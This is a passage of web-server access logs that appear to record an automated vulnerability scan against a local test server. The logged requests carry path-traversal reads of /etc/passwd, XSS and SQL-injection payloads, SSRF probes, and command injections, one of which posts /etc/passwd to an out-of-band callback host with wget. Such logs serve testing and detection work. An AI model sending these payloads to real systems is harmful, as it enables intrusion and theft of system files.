+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/123contactform-for-wordpress/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wow-company&tab=http://c9v8hn0smpv8c57g0t008yrh1ac71cwny.oast.live/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/_swagger_/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /database.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ALFA_DATA/alfacgiapi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /otobo/index.pl?Action=ExternalURLJump;URL=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/side.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/assets/backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F127.0.0.1%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /httptrace HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/spec/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/ALFA_DATA/alfacgiapi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/side.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /shindig/gadgets/proxy?container=default&url=http://oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.170","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20c9v8hs0smpv8c6ag07h0wiwcgnq4yj311.oast.online) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://c9v8hn0smpv8c57g0t00e4nr4f3kdah9k.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.173","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/httptrace HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db_backup.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/init HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/spec/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xml/User/User.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/XUI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.182","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"email='+or+2>1+--+&password=&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /scrm/crm/admin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dbdump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\x22'; wget http://c9v8hs0smpv8c6ag07h04g9kthc3pytat.oast.online #","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/ui/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.xhtml?faces-redirect=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download/index.php?file=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jkstatus/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.177","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/json/serverinfo/* HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__swagger__/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /haproxy-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /counters HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.192","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////http://127.0.0.1example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.192","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.193","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.047","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\x22'; wget http://c9v8hs0smpv8c6ag07h0m3sdeigjdabam.oast.online #","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/login.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.185","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.187","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/add-on/business-continuity/api/cruise_config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_swagger_/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/admin/common/clearcache?previousUrl=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /flow/registries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authorization.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.204","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/add-on/business-continuity/api/cruise_config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/swagger-ui/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:18 